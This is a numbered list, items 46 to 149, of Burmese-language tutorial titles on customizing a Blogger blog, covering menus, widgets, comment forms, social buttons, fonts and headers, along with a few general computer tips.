- ၄၆။မိမိရဲ့Link ေတြကိုပိုမိုလွပသြားေအာင္ Rollover Button နဲ႕လုပ္ျခင္ရင္
- ၄၇။မိမိရဲ့ဘယ္ Post မွာ Comments ဘယ္ေလာက္ရိွတယ္ဆိုတာသိျခင္၇င္
- ၄၈။မိမိရဲ႔Postေအာက္မွာ Sexy Bookmarks ေလးထားျခင္းရင္
- ၄၉။မိမိရဲ့ဘေလာ့မွာMouseေနာက္ကေန တေကာက္ေကာက္လိုက္ေနတဲ့စာေၾကာင္းေလးထားျခင္ရင္
- ၅ဝ။မိမိဘေလာ့မွာလြယ္ကူတဲ့ကိုယ္ပိုင္ Menu ေလးတည္ေဆာက္ျခင္ရင္
- ၅၁။မိမိရဲ့Commentsေတြကိုနံပါတ္အစဥ္လိုက္ထည့္ျခင္ရင္
- ၅၂။အခမဲ့ Dropdown Menu Creator အသံုးလို၇င္
- ၅၃၊မိမိရဲ႕ဘေလာ့မွာ Psf ' icon ထားျခင္ရင္
- ၅၄။မိမိရဲ႕ဘေလာ့နွင့္ဝက္ဆိုက္ဖြင့္ရတယ္ေနွးေနတာကိုျမန္ေစျခင္ရင္
- ၅၅။မိမိရဲ့ဘေလာ့ေဘးေလးမွာ Twitter-Follow Me icon ေလးထားျခင္ရင္
- ၅၆။မိမိရဲ႕ဘေလာ ့Post ေပၚမွာေအာက္ခံအေရာင္နွင့္Code ကေနတဆင့္စားသားအေရာင္ေလးေရြးထည့္ျခင္ရင္
- ၅၇။မိမိရဲ့ဘေလာ့အသစ္ထပ္ဖြင့္ျပီးဘေလာ့အေဟာင္းထဲ Postေတြကိုအသစ္ထဲသို႔ေျပာင္းျခင္းရင္
- ၅၈။အမိမိရဲ related posts ေတြကို thumbnails စတိုင္နဲ႕ Auto လုပ္ျခင္ရင္
- ၅၉။မိမိေရးတဲ့Commentသူငယ္ခ်င္းေတြေ၇းတဲ့Commentေတြကိုမတူေအာင္လုပ္ျခင္ရင္
- ၆ဝ။မိမိသံုးေနသည့္ internet Wi-Fi ကေနွးေနရင္ ျမန္ေအာင္ျပဳလုပ္ျခင္ရင္
- ၆၁။မိမိရဲ႕ဘေလာ့မွာAuto Scrolling - Recent Postsထည့္ထားျခင္ရင္
- ၆၂။မိမိရဲ႕ဘေလာ့မွာ Wibiya Toolbar ထည့္ထားျခင္ရင္
- ၆၃။မိမိရဲ႕ပံုနွင့္ဓါတ္ပံုေတြကိုအခမဲ့ onlineကေနျပီးေတာ့ Editingလုပ္ျခင္ရင္
- ၆၄။ဘေလာ့Postေအာက္မွာရိွတဲ့Subscribe to: Posts (Atom) ဆိုတဲ့စာေၾကာင္းေလးျဖဳတ္ျခင္ရင္
- ၆၅။မိမိရဲ႕ဘေလာ့Postတခုစီရဲ႕အေပၚမွာCommentအေရအတြက္Bubble Iconေလးထားျခင္ရင္
- ၆၆။မိမိရဲ့Computer Taskbar Digital Time ေဘးမွာနာမည္ေလးထည့္ထားျခင္ရင္
- ၆၇။မိမိရဲ႕ဘေလာ့ကလင့္ခ္တစ္ခုခုကိုနိုပ္လိုက္ရင္Windowအသစ္နဲ႕ေပၚေအာင္လုပ္ျခင္ရင္
- ၆၈။မိမိရဲ႕ဘေလာ့ပိုမိုၿပီးလွပေစရန္(Header)ေပၚမွာ Add Page Elementထည့္ျခင္ရင္
- ၆၉။အခမဲ့ Blogger Template Generators လင့္ခ္မ်ား
- ၇ဝ။ကြန္ပ်ဴတာ keyboardတစ္ခုလံုးရဲ႕အသံုးဝင္ပံုေလးကိုသိျခင္ရင္
- ၇၁။ဘေလာ့နွင့္ဝက္ဆိုက္အတြက္အေကာင္းဆံုးျဖစ္ေသာChatting Box (၁o)ခု
- ၇၂။အခမဲ့ File Hosting ဆိုက္မ်ား
- ၇၃။အခမဲ့ Image Hosting ဆိုက္မ်ား
- ၇၄။မိမိကြန္ပ်ဴတာ memory ညွစ္ပတ္ေနတယ္ဆိုရင္၊memoryသန္႕ရွင္းေအာင္လုပ္ျခင္ရင္
- ၇၅။မိမိရဲ႕GmailေတြကိုOutlook Express ပံုစံလိုမ်ိဳးDestopေပၚမွာGmail Icon ေလးထားျခင္ရင္
- ၇၆။မိမိရဲ႕ဘေလာ့မွာအေပၚေအာက္အဆင္းအတက္ေလးထားျခင္ရင္
- ၇၇။တခ်က္ေလးနုိပ္လိုက္၇င္မိမိ၇ဲ့ Postအသစ္အေဟာင္းအားလုံးေပၚလာေအာင္လုပ္
- ၇၈။Poat တစ္ခုကိုအျမဲတမ္းဘဲအေပၚဆံုးမွာေပၚေအာင္လုပ္ျခင္ရင္
- ၇၉။မိမိရဲ႕ဘေလာ့ Sidebar ေနာက္ခံအေရာင္ေျပာင္းျခင္ရင္
- ၈ဝ။မိမိရဲ႕ဘေလာ့Recent Comments ေတြကို Summariesနဲ႕လုပ္ျခင္ရင္
- ၈၁။မိမိရဲ႕ဘေလာ့မွာလြယ္လြယ္ကူကူနွင့္ 5-star rating ေလးထည့္ျခင္ရင္
- ၈၂။မိမိရဲ႕ဘေလာ့Post ကေန႕စြဲေလးကိုCalendar style နဲ႕ေျပာင္းျခင္ရင္
- ၈၃။မိမိရဲ႕ဘေလာ့မွာ Email Subscrtiption Form ထည့္ျခင္ရင္
- ၈၄။Post တစ္ခု နွင့္တစ္ခုကိုပိုင္းျခားေပးတဲ့မ်ဥ္းေၾကာင္းအစားအျခားပံုထည့္ျခင္ရင္
- ၈၅။မိမိရဲ႕ဘေလာ့မွာFloating Vertical Navigation Menu သံုးျခင္ရင္
- ၈၆။HTML code ကို post မွာေနာက္ခံပံုႏွင့္ေပၚေအာင္လုပ္ျခင္ရင္
- ၈၇။ဆိုက္ဘားႏွစ္ခုမွာေအာက္ကေကာ္လန္သံုးခုခြဲထည့္ျခင္ရင္
- ၈၈။မိမိရဲ႕ဘေလာ့မွာ Twitter follow me Icon ေလးထားျခင္ရင္
- ၈၉။YOU TUBE သီခ်င္းမ်ားကို MP-3ျဖင့္ယူျခင္ရင္
- ၉ဝ။မိမိရဲ႕ဘေလာ့မွာ Google Search Engine စတိုင္ေလးသံုးျခင္ရင္
- ၉၁။မိမိရဲ႕ဘေလာ့မွာPop Up Navigation Menu From Bucketထားျခင္ရင္
- ၉၂။မိမိရဲ႕ဘေလာ့Sidebarလင့္ခ္ေတြရဲ႕အေရွ႕မွာေပၚတဲ့ Icons ပံုေလးေတြကိုေျပာင္းခ်င္ရင္
- ၉၃။မိမိရဲ႕ဘေလာ့မွာ Label ကို 3d wobbling tag cloud အသံုးျပဳခ်င္ရင္
- ၉၄။မိမိရဲ႕Post အေပၚဘက္ေထာင့္ေလးမွာFacebook Share Buttonေလးထားခ်င္ရင္
- ၉၅။မိမိရဲ႕ဘေလာ့မွာFacebook Badge ေလးထည့္ထားခ်င္ရင္
- ၉၆။မိမိရဲ႕ဘေလာ့စာမ်က္ႏွာကစာလံုးေတြအၾကီးအေသးေျပာင္းခ်င္ရင္
- ၉၇။မိမိရဲ႕ဘေလာ့ Mouse poiter ေနရာမွာပံုေလးအစားထိုးသံုးခ်င္ရင္
- ၉၈။မိမိမွာရိွတဲ့အျခာAccountsေတြကို(Yahoo>>Hotmail>>AOL Email) Gmailထဲမွာဘဲဖတ္မယ္ပို႕မယ္
- ၉၉။မိမိဘေလာ့မွာလြယ္ကူတဲ့ Multi tab Widgetေလးထားခ်င္ရင္) Gmailထဲမွာဘဲဖတ္မယ္ပို႕မယ္
- ၁ဝဝ။မိမိရဲ႕ဝက္ဆိုက္ႏွင့္ဘေလာ့Loading Time ၾကာခ်ိန္ၾကည့္ခ်င္ရင္
- ၁ဝ၁။မိမိရဲ႕ဘေလာ့ထဲကိုဝင္တဲ့Email Account ေျပာင္းခ်င္ရင္
- ၁ဝ၂။ဘေလာ့မွာMarque Sliding Effect ေတြသံုးခ်င္တယ္ဆိုရင္
- ၁ဝ၃။မိမိရဲ႕ဘေလာ့ Postေအာက္မွာ Comment Form ေလးထားခ်င္ရင္
- ၁ဝ၄။မိမိရဲ႕ဘေလာ့ Comment Form ေလး Size ေျပာင္းခ်င္ရင္
- ၁ဝ၅။ဘေလာ့ Post ကBorder Image ေလးျဖဳတ္ခ်င္ရင္
- ၁ဝ၆။မိမိရဲ႕ဘေလာ့မွာWordpress စတိုင္ Typepad Snapshotsေလးသံုးခ်င္ရင္
- ၁ဝ၇။မိမိရဲ့ဘေလာ့ Post Title ကိုအလည္မွာထားခ်င္ရင္
- ၁ဝ၈။မိမိဘေလာ့နာမည္ေလးကိုမရပ္ဘဲသြားေအာင္လုပ္ခ်င္ရင္
- ၁ဝ၉။မိမိရဲ႕ဘေလာ့ Post ကစလံုးႏွင့္အေရာင္ေျပာင္းခ်င္ရင္
- ၁၁ဝ။မိမိရဲ႕ဘေလာ့ Header မွာပံုထည့္ထားခ်င္ရင္
- ၁၁၁။မိမိရဲ႕ဘေလာ့မွာဘယ္သူက Comments ဘယ္ေလာက္ေပးတယ္ဆိုတာသိခ်င္ရင္
- ၁၁၂။မိမိရဲ႕ဘေလာ့လင့္ခ္ကိုSearch engines(၁ဝဝ)မွာSubmitခ်င္ရင္
- ၁၁၃။မိမိရဲ႕ဘေလာ့ Post ေအာက္မွာ Printer Button ေလးထည့္ထားခ်င္ရင္
- ၁၁၄။မိမိရဲ့ဘေလာ့လင့္ခ္ကို Google Search မွာရွာရလြယ္ေအာင္လုပ္ခ်င္ရင္
- ၁၁၅။မိမိရဲ႕ဘေလာ့ Post ကို(ဖြင့္/ဖြတ္)Show/Hide ေလးနဲ႕လုပ္ခ်င္ရင္
- ၁၁၆။မိမိရဲ႕ဘေလာ့မွာSocial Bookmark Iconsေတြအသဲႏွလံုးပံုနွင့္ထားျခင္ရင္
- ၁၁၇။မိမိရဲ႕ဘေလာ့မွာSocial Bookmark Iconsသစ္ရြတ္ပံုေလးနွင့္ထားျခင္ရင္
- ၁၁၈။မိမိရဲ႕ဘေလာ့မွာFooter Sectionမွာ 4-Columnsေလးထည့္ခ်င္ရင္
- ၁၁၉။မိမိရဲ႕ဘေလာ့ေနာက္ခံမွာလြယ္ကူစြာပံုထည့္ခ်င္ရင္
- ၁၂ဝ။ဘေလာ့ Post title ကိုပံုနွင့္အစားထိုးခ်င္ရင္
- ၁၂၁။မိမိရဲ႕ဘေလာ့ Header ကိုစိတ္တိုင္းက်လုပ္ခ်င္ရင္အေကာင္းဆံုး software
- ၁၂၂။မိမိရဲ႕ဘေလာ့ Post Title Font ကိုအၾကီးအေသးေျပာင္းခ်င္ရင္
- ၁၂၃။မိမိရဲ႕ဘေလာ့ Mouse poiter မွာ Multi-Color Effect ေလးထည့္ခ်င္ရင္
- ၁၂၄။မိမိရဲ႕ဘေလာ့ Post မွာ Scrollbars ကိုသံုးခ်င္ရင္
- ၁၂၅။မိမိရဲ႕ဘေလာ့မွာ jQuery Popup ေလးထည့္သံုးခ်င္ရင္
- ၁၂၆။ဘေလာ့မွာလြယ္ကူစြာRecent Comments Widget ထည့္ျခင္ရင္
- ၁၂၇။မိမိရဲ႕ဘေလာ့မွာ Contect me form ႏွင့္ Cbox တို႕ကို Popup စတိုင္းနဲ႕လုပ္ခ်င္ရင္
- ၁၂၈။မိမိဘေလာ့Sidebar Titles ေျပာင္းခ်င္ရင္
- ၁၂၉။မိမိရဲ႕ဘေလာ့Post Fontကို Dropdown ပံုစံေျပာင္းခ်င္ရင္
- ၁၃ဝ။မိမိရဲ႕ဘေလာ့Post ကို အီးေမးလ္ႏွင့္ Hand ဖုန္းကေနတင္ခ်င္ရင္
- ၁၃၁။မိမိရဲ႕ဘေလာ့ Comment Box က Post a comment ကို ပံုႏွင့္အစားထိုးခ်င္ရင္
- ၁၃၂။မိမိရဲ႕ဘေလာ့ Post ရဲ႕ပထမစလံုးကိုအၾကီးနဲ႕ေရးခ်င္ရင္
- ၁၃၃။မိမိရဲ႕ဘေလာ့မွာ Vertical menubar ေလးထည့္ခ်င္ရင္
- ၁၃၄။မိမိရဲ႕ဘေလာ့မွာ NavBar ကို Show/Hide ပံုစံနဲ႕လုပ္ခ်င္ရင္
- ၁၃၅။ မိမိရဲ႕ဘေလာ့Post က Read More ကိုပံုနဲ႕အစားထိုးခ်င္ရင္
- ၁၃၆။မိမိရဲ႕ဘေလာ့မွာ Page Navigationထည့္ခ်င္ရင္
- ၁၃၇။မိမိရဲ႕ဘေလာ့ Label လင့္ခ္ဝင္ရင္ေခါင္းစဥ္ေတြဘဲေပၚေအာင္လုပ္ခ်င္ရင္
- ၁၃၈။မိမိရဲ႕ဘေလာ့မွာJQuery MouseOver Social Bookmarkေလးထားခ်င္ရင္
- ၁၃၉။မိမိရဲ႕ဘေလာ့မွာCharm CSS Horizontal Menu သံုးခ်င္၇င္
- ၁၄ဝ။Mozilla Firefox သံုးသူေတြအတြက္သိသင့္တဲ့Keyboard အသံုးဝင္ပံု
- ၁၄၁။မိမိရဲ႕ဘေလာ့မွာRecent Comments ၾကိဳက္သေလာက္ေပၚေစခ်င္ရင္
- ၁၄၂။မိမိရဲ႕ဘေလာ့Postေတြကို Auto Read more Funtion လုပ္ခ်င္ရင္
- ၁၄၃။မိမိရဲ႕ဘေလာ့ Post ေတြကိုၾကိဳက္တဲ့ေနရာကေနဆက္ဖတ္ရန္ဆိုျပီးလုပ္ခ်င္ရင္
- ၁၄၄။မိမိရဲ႕ဘေလာ့Postေတြကို Auto Read more Funtion အလြယ္ဆံုးနည္းနဲ႕လုပ္ခ်င္ရင္
- ၁၄၅။မိမိရဲ႕ဘေလာ့ Home Page လင့္ခ္မွာ Post Title ေတြကိုဘဲေပၚေအာင္လုပ္ခ်င္ရင္
- ၁၄၆။ဘေလာ့Post ေအာက္က Subscribe to: Posts (Atom) ကို (RSS) ေျပာင္းခ်င္ရင္
- ၁၄၇။မိမိဘေလာ့မွာရိွတဲ့လင့္ခ္ေတြကိုလွလွေလးလုပ္ခ်င္ရင္
- ၁၄၈။မိမိရဲ႕ဘေလာ့က Post ေတြရဲ႕စလံုးအၾကီးအေသးေျပာင္းခ်င္ရင္
- ၁၄၉။ဘေလာ့က Post ေတြရဲ႕စလံုးအၾကီးအေသးႏွွင့္အေ၇ာင္ေျပာင္းခ်င္၇င္